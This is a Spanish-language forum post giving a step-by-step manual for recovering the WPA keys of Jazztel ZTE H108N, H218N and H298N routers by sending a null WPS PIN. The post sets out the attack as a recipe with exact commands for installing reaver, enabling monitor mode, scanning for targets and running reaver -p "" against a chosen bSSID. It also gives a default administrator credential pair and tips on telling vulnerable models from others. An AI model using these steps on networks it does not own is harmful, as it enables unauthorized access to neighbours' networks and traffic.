Foro Wifi-libre.com

Explicaciones y manual "paso a paso" para crackear los ZTE H108N, ZTE H218N y ZTE H298N de Jazztel en dos segundos

Vídeo de demostración

vídeo previamente publicado aquï:     0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Routers afectados en España

• Router ZTE h108n

• Router fibra ZTE H218N

• Router fibra ZTE H298N

  Jazztel ha exclusivamente empleado estos modelos durante años después elegir ZTE como proveedor de hardware en lugar de Comtrend y Technicolor
      Diría que los primeros PA de este tipo han aparecido por mi barrio en 2012-2013
  Se distinguen fácilmente de los Comtrend porque su eSSID por defecto gasta 4 dígitos ascii (JAZTELL_XXXX) mientras que los Comtrend o Technicolor tienen 4 o 6 caracteres hexadecimales.

   
  Al contrario; los routers ZTE F660 y ZTE F680 no son vulnerables.
El ZTE F680 tiene soporte "ac": Son menos comunes que los modelos vulnerables.
Si tu adaptador wifi es de doble banda los distingues enseguida porque emiten dos redes
El eSSID de la red ac es el mismo que el eSSID de la red b/g/n añadiendo "_5G" al final
JAZZTEL_XXXX en frecuencias de 2.4 GHz y JAZZTEL_XXXX_5G en frecuencias de 5GHz
  Si es un FTE 660 o si tu WiFi es unicamente b/g/n se pueden distinguir mirando los paquetes PROBE,
Veremos cómo en el manual, es muy fácil.

Antigua vulnerabilidad

En sus inicios estos tres modelos venían con el PIN 12345670 activado por defecto
Es la peor configuración posible ya que reaver las crackeaba con un solo intento: 12345670 es el PIN que manda reaver primero.
Captura del 2014:

  Tenían además una puerta trasera ya que los técnicos de Jazztel solían "olvidarse" una cuenta con derechos de administrador
   user: avanzado
   pass: avanzado
  Eran probablemente los PA los más inseguros en 2014-2015.

La cosa cambió en 2015: Jazztel actualizó todos los firmwares y el PIN 12345670 no estaba habilitado. (Y la cuenta avanzado:avanzado fue deshabilitada)
Un ataque brute force no daba resultado, no conseguíamos comprobar un solo PIN...
Lo mismo que hoy en día.
  Si intentas hacer un ataque de fuerza bruta no llegarás a ninguna parte:

El router manda un M5 (primera mitad supuestamente acertada) cuál sea el PIN que mandes 
Y podrías probar todos los PIN posibles y siempre tendrás un M5 pero nunca tendrás el M7-M8 => llave WPA. 
¿Por qué? Sigas leyendo...

Brecha "PIN NULL" (sin valor atribuido)

  Hemos hablado aquí de esta idea hace meses atrás: Crack WPS mandando un PIN "en blanco" (null)
  Recuerdo que para tener el WPS en modo PIN correctamente configurado un fabricante debe (en teoría):

• Habilitar el WPS

• Configurar un PIN que cumple con la regla checksum

  Es lo que estipula la wifi-aliance en su especificación del WPS
En la practica hemos visto que todo es posible y que los fabricantes se saltan las reglas. 
Por ejemplo los routers pueden tener un PIN por defecto "no conforme".
Es decir un PIN que no respectan la regla Checksum (el Amper WLAN_XXXX por ejemplo)
 
  En este caso la configuración WPS se ha hecho así:

BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=
#

• Tenemos a una variable wps_device_pin que está declarada.

• El valor atribuido es ... nada. Es decir NULL (nulo) 

  El WPS está habilitado sin PIN definido: Una configuración que sale del guión de la Wifi-Alliance.
    Para recuperar la llave en estos casos se debe mandar un PIN en blanco.
Cosa que podéis hacer con reaver desde la versión 1.6.b. con la opción -p mejorada.( "-p with arbitrary string")

	-p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin

La opción permite mandar la cadena que sea en lugar de un PIN WPS conforme (8 dígitos y el ultimo es una suma de comprobación de los siete anteriores)
se hace con

-p ""

o

-p ''

* Podemos mandar un PIN que no cumple la regla del checksum para estos routers que no cumplen la regla
* Podemos mandar un PIN en blanco para crackear los puntos de acceso que tienen su PIN definido sin valor
* Podemos mandar "¡Quiero la llave WPA!".... Desgraciadamente no suele dar resultados, ni siquiera con un "Por favor"
  Puede ser lo que queréis.
  De paso doy las gracias a binnarymaster para proponer y codificar esta mejora de la opción -p "con cadenas arbitrarias" . (ver Add arbitrary string PIN feature )
  Notad que el fantástico Wireless Air Cut para Windows amigo de nuestro amigo Patcher es también capaz de mandar un PIN en blanco y aprovechar esta brecha. 

Manual paso a paso
   "Crack ZTE Jazztel con PIN nulo"

* Por lo que es de hacerlo desde Windows con waircut les invito a consultar el hilo dedicado: Wireless Air Cut, auditoria del protocolo wps en Windows

1) Instalar reaver 1.6.1 (o una versión superior)

Lo hago desde Kali pero los pasos valen para cualquier distribución basada en debian.

1. Instalar la dependencia:

   sudo apt install libcap-dev aircrack-ng

2. Si no está hecho ya instalas git:

   sudo apt install git

3. Descargas la rama GitHub

   git clone https://github.com/t6x/reaver-wps-fork-t6x.git

4. Situarse en el directorio que se acaba de crear para alojar el código fuente

   cd /reaver-wps-fork-t6x*/src/

5. Compilar

   ./configure && make

6. Instalar

   sudo make install

  Sí tienes reaver ya instalado no pasa nada: Instalando reaver 1.6.1 lo "actualizarás"

Escaneando en búsqueda de objetivo

Activar el modo monitor con airmon-ng

sudo airmon-ng wlan0

Escanear con airodump-ng empleando los parámetros --wps et --manufacturer
Obviamente el parámetro --wps es importante para escanear el WPS.
  El parámetro --manufacturer nos viene de perla porque vemos al instante si los PA son ZTE.

sudo airodump-ng wlan0mon --manufacturer --wps

Crack instantáneo

Una vez que aparece el objetivo parramos el escaneo con ctrl+c
Copiamos el bSSID para pegarlo en nuestra linea de orden reaver

sudo reaver -i wlan0mon -b <bSSID> -vv -p "" 

Si no estamos en buenas condiciones es recomendable fijar el canal para que reaver lo detecte el objetivo y aumentar levemente el tiempo de time out para que reaver espere un poco más la respuesta del router

sudo reaver -i wlan0mon -b <bSSID> -c <nºcanal> -t 8 -T 8 -vv -p ""

¿Qué hacer si no me sale?

  Insistir.
Veis en el vídeo que el ataque puede requerir varios intentos.
A estas alturas tenemos claro que vale solo para los Jaztell ZTE.
El problema es que con el escaneo airodump-ng no podemos saber si estamos en presencia de un modelo soportado  (H108N, H218N o H298N)  o de un modelo no soportado (F660 y F680)
  Para distinguirlos:

• Si llegamos más lejo que el M2 es que está a priori vulnerable.
  Con un ataque sobre F660 y F680 nunca obtenemos el M3:
  

• Para tener lo más claro que el agua,

  1. Pasamos en modo managed

     airmon-ng stop wlan0mon

  2. Obtenemos la información emitida en los PROBE.
     Para ello solo tenemos que copiar el bSSID del dispositivo que nos tiene intrigado en la linea que sigue:

     iw wlan1 scan | grep -E "bSSID|Model Number" | grep -A 1 "BSSID"

     Veremos en un instante si es un F660 o un F680 y por lo tanto si no es vulnerable:
     

Si llevas un tiempo machacando el router y que no obtienes nada aunque sea vulnerable, deja lo reposar un rato y vuelve a intentarlo.
"Lo bueno" es que no se bloquea.

  Jazztel se despide de la escena wifi ibérica saliendo por la puerta grande, dejando a cienes de miles de routers hackeables en unos segundos.
Si tienes un NH198N, un ZH218N o un ZH298N poco puedes hacer para impedir el crack.
  La interfaz web está capada y desconozco la contraseña de Jazztel (no la dan) para abrir una sesión telnet con derechos de administrador. 
  Sería la única forma que se me ocurre para poder deshabilitar del todo el WPS en modo PIN.
La vulnerabilidad se podría explotar en otros routers,
Específicamente contra los modelos que mandan sistemáticamente un M5 (pimera mitad supuestamente acertada) cuando probamos el PIN que sea.
  Este comportamiento errático y ilógico indica que un PIN nulo está configurado.